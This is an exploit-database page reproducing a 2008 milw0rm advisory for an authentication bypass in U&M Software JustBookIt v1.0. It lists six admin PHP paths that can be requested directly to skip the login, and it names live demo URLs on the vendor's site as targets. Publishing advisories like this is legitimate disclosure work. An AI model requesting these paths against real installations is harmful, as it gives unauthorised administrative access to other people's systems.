header-logo
Suggest Exploit
vendor:
JustBookIt
by:
G4N0K
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: JustBookIt
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:u_and_m_software:justbookit
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

U&M Software JustBookIt v1.0 Auth Bypass Vulnerability

U&M Software JustBookIt v1.0 is vulnerable to an authentication bypass vulnerability. An attacker can use one of the paths mentioned in the exploit to bypass the admin login. These paths are http://localhost/[path]/admin/user_manual.php, http://localhost/[path]/admin/user_config.php, http://localhost/[path]/admin/user_kundnamn.php, http://localhost/[path]/admin/user_kundlista.php, http://localhost/[path]/admin/user_aktiva_kunder.php, http://localhost/[path]/admin/database.php. Live examples of this exploit can be found at http://www.justbookit.uochm.com/demo/admin/index.php and http://www.justbookit.uochm.com/demo/admin/user_config.php.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the software to the latest version.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	U&M Software JustBookIt v1.0 Auth Bypass Vulnerability
==============================================================================

	[»] Script:             [ U&M Software JustBookIt v1.0 ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.hotscripts.com/Detailed/79959.html ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 06.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[!] Use one of these paths to bypass admin login ;)
	
	[»] http://localhost/[path]/admin/user_manual.php
	[»] http://localhost/[path]/admin/user_config.php
	[»] http://localhost/[path]/admin/user_kundnamn.php
	[»] http://localhost/[path]/admin/user_kundlista.php
	[»] http://localhost/[path]/admin/user_aktiva_kunder.php
	[»] http://localhost/[path]/admin/database.php
	


===[ LIVE ]===

	[»] http://www.justbookit.uochm.com/demo/admin/index.php
	[»] http://www.justbookit.uochm.com/demo/admin/user_config.php


	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit(); //EoX
===============================================================================

# milw0rm.com [2008-11-07]

Navigation

Suggest Exploit

Services By CQR